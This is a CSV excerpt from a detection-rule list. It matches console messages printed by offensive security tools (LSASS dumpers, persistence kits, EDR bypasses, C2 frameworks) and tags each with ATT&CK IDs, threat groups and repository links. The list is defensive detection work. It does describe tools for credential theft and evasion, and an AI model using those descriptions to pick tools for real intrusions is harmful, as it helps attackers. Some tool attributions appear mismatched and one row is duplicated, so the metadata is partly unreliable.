"*[+] Building GTFOBins lists*",".{0,1000}\[\+\]\sBuilding\sGTFOBins\slists.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","#content","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","13071"
"*[+] Building linux exploit suggesters*",".{0,1000}\[\+\]\sBuilding\slinux\sexploit\ssuggesters.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","#content #linux","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","13072"
"*[+] Building S4U2proxy request for service: *",".{0,1000}\[\+\]\sBuilding\sS4U2proxy\srequest\sfor\sservice\:\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13073"
"*[+] Building S4U2self *",".{0,1000}\[\+\]\sBuilding\sS4U2self\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13074"
"*[+] Callback forwarded to Brute Ratel Server*",".{0,1000}\[\+\]\sCallback\sforwarded\sto\sBrute\sRatel\sServer.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","13075"
"*[+] Capabilities backdoor persistence establish*",".{0,1000}\[\+\]\sCapabilities\sbackdoor\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13076"
"*[+] Captured snapshot of LSASS process*",".{0,1000}\[\+\]\sCaptured\ssnapshot\sof\sLSASS\sprocess.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#content","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","13077"
"*[+] Clearing msDS-KeyCredentialLink before adding our new KeyCredential*",".{0,1000}\[\+\]\sClearing\smsDS\-KeyCredentialLink\sbefore\sadding\sour\snew\sKeyCredential.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#content","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","13078"
"*[+] COFF Loader mode is selected!*",".{0,1000}\[\+\]\sCOFF\sLoader\smode\sis\sselected!.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#content","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","13079"
"*[+] COM Hijacked!*",".{0,1000}\[\+\]\sCOM\sHijacked!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","#content","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","13080"
"*[+] Connected to \\\\*\\IPC$*",".{0,1000}\[\+\]\sConnected\sto\s\\\\\\\\.{0,1000}\\\\IPC\$.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","#content","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","13081"
"*[+] Connnecting to all computers and try to get dpapi blobs and master key files*",".{0,1000}\[\+\]\sConnnecting\sto\sall\scomputers\sand\stry\sto\sget\sdpapi\sblobs\sand\smaster\skey\sfiles.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","#content","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","13082"
"*[+] Copying a Shellcode To Target Memory*",".{0,1000}\[\+\]\sCopying\sa\sShellcode\sTo\sTarget\sMemory.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","#content","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","13083"
"*[+] Could not find TeamFiltration config*",".{0,1000}\[\+\]\sCould\snot\sfind\sTeamFiltration\sconfig.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","13084"
"*[+] Create evil class for file transfer*",".{0,1000}\[\+\]\sCreate\sevil\sclass\sfor\sfile\stransfer.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","#content","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","13085"
"*[+] Created a remote GAC file stream*",".{0,1000}\[\+\]\sCreated\sa\sremote\sGAC\sfile\sstream.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","#content","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","13086"
"*[+] Created Elevated HKLM:*",".{0,1000}\[\+\]\sCreated\sElevated\sHKLM\:.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","#content","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","13087"
"*[+] Created malicious pre-commit hook in *",".{0,1000}\[\+\]\sCreated\smalicious\spre\-commit\shook\sin\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13088"
"*[+] Creating HookChain implants*",".{0,1000}\[\+\]\sCreating\sHookChain\simplants.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#content","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","13089"
"*[+] Creating HookChain implants*",".{0,1000}\[\+\]\sCreating\sHookChain\simplants.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#content","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","13090"
"*[+] Creating mock directories*",".{0,1000}\[\+\]\sCreating\smock\sdirectories.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","#content","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","13091"
"*[+] Creating Service on Remote Target?*",".{0,1000}\[\+\]\sCreating\sService\son\sRemote\sTarget\?.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13092"
"*[+] Cron persistence established*",".{0,1000}\[\+\]\sCron\spersistence\sestablished.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13093"
"*[+] cross realm S4U2Self success!*",".{0,1000}\[\+\]\scross\srealm\sS4U2Self\ssuccess!.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#content","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","13094"
"*[+] Cryptomining folder created!*",".{0,1000}\[\+\]\sCryptomining\sfolder\screated!.{0,1000}","offensive_tool_keyword","cryptomining","A Linux Cyptomining malware","T1496","TA0009","N/A","N/A","Cryptomining","https://github.com/tarcisio-marinho/cryptomining","1","0","#linux #content","N/A","7","1","36","15","2023-05-05T02:42:59Z","2018-04-07T03:59:52Z","13095"
"*[+] Decrypted SYSTEM vault policy*",".{0,1000}\[\+\]\sDecrypted\sSYSTEM\svault\spolicy.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#content","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","13096"
"*[+] Defender Config Dumped to *",".{0,1000}\[\+\]\sDefender\sConfig\sDumped\sto\s.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13097"
"*[+] delete single event log succ*",".{0,1000}\[\+\]\sdelete\ssingle\sevent\slog\ssucc.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","#content","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","13098"
"*[+] Deobfuscated dump saved in file decrypted.dmp*",".{0,1000}\[\+\]\sDeobfuscated\sdump\ssaved\sin\sfile\sdecrypted\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","#content","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","13099"
"*[+] Detecting hooks in new ntdll module*",".{0,1000}\[\+\]\sDetecting\shooks\sin\snew\sntdll\smodule.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#content","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","13100"
"*[+] Direct syscalls have been disabled, getting API funcs from ntdll in memory!*",".{0,1000}\[\+\]\sDirect\ssyscalls\shave\sbeen\sdisabled,\sgetting\sAPI\sfuncs\sfrom\sntdll\sin\smemory!.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13101"
"*[+] Direct syscalls have been disabled, getting API funcs from ntdll in memory!*",".{0,1000}\[\+\]\sDirect\ssyscalls\shave\sbeen\sdisabled,\sgetting\sAPI\sfuncs\sfrom\sntdll\sin\smemory!.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13102"
"*[+] DLL dropped!*",".{0,1000}\[\+\]\sDLL\sdropped!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","#content","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","13103"
"*[+] Docker container persistence establish*",".{0,1000}\[\+\]\sDocker\scontainer\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13104"
"*[+] Domain Password Spray *",".{0,1000}\[\+\]\sDomain\sPassword\sSpray\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13105"
"*[+] Downloading Fat Linpeas binaries*",".{0,1000}\[\+\]\sDownloading\sFat\sLinpeas\sbinaries.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","#content","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","13106"
"*[+] Downloading PS2exe and generating payload*",".{0,1000}\[\+\]\sDownloading\sPS2exe\sand\sgenerating\spayload.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","#content","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","13107"
"*[+] DPAPI secrets exported*",".{0,1000}\[\+\]\sDPAPI\ssecrets\sexported.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#content","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","13108"
"*[+] DpapiDump Loaded *",".{0,1000}\[\+\]\sDpapiDump\sLoaded\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13109"
"*[+] DpapiDump Loaded*",".{0,1000}\[\+\]\sDpapiDump\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13110"
"*[+] Dropping into shell*",".{0,1000}\[\+\]\sDropping\sinto\sshell.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#content #linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","13111"
"*[+] dropping suid shell*",".{0,1000}\[\+\]\sdropping\ssuid\sshell.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#content #linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","13112"
"*[+] Dump %wZ memory to: %wZ*",".{0,1000}\[\+\]\sDump\s\%wZ\smemory\sto\:\s\%wZ.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#content","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","13113"
"*[+] Dump sent successfully to remote host!*",".{0,1000}\[\+\]\sDump\ssent\ssuccessfully\sto\sremote\shost!.{0,1000}","offensive_tool_keyword","RustiveDump","LSASS memory dumper using only NTAPIs","T1003.001 - T1055 - T1106","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/safedv/RustiveDump","1","0","#content","N/A","10","4","332","43","2025-03-08T12:10:35Z","2024-10-06T16:01:49Z","13114"
"*[+] Dumped Allowed Threats to * ",".{0,1000}\[\+\]\sDumped\sAllowed\sThreats\sto\s.{0,1000}\s","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13115"
"*[+] Dumped Exclusion Paths to ExclusionPaths.csv*",".{0,1000}\[\+\]\sDumped\sExclusion\sPaths\sto\sExclusionPaths\.csv.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13116"
"*[+] Dumped Exploit Guard Protection History*",".{0,1000}\[\+\]\sDumped\sExploit\sGuard\sProtection\sHistory.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13117"
"*[+] Dumped Firewall Exclusions to *",".{0,1000}\[\+\]\sDumped\sFirewall\sExclusions\sto\s.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13118"
"*[+] Dumped Protection History to ProtectionHistory.csv*",".{0,1000}\[\+\]\sDumped\sProtection\sHistory\sto\sProtectionHistory\.csv.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13119"
"*[+] Dumping Defender Excluded Paths*",".{0,1000}\[\+\]\sDumping\sDefender\sExcluded\sPaths.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13120"
"*[+] Dumping Defender Protection History*",".{0,1000}\[\+\]\sDumping\sDefender\sProtection\sHistory.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13121"
"*[+] Dumping Enabled ASR Rules*",".{0,1000}\[\+\]\sDumping\sEnabled\sASR\sRules.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13122"
"*[+] Elevated to SYSTEM privileges*",".{0,1000}\[\+\]\sElevated\sto\sSYSTEM\sprivileges.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#content","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","13123"
"*[+] Empire credential import successful*",".{0,1000}\[\+\]\sEmpire\scredential\simport\ssuccessful.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#content","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","13124"
"*[+] Enable SeDebugPrivilege: \tOK*",".{0,1000}\[\+\]\sEnable\sSeDebugPrivilege\:\s\\tOK.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","#content","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","13125"
"*[+] Encoding with base64 and reverse it to avoid detections*",".{0,1000}\[\+\]\sEncoding\swith\sbase64\sand\sreverse\sit\sto\savoid\sdetections.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#content","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","13126"
"*[+] Encrypted Shellcode: *",".{0,1000}\[\+\]\sEncrypted\sShellcode\:\s.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","13127"
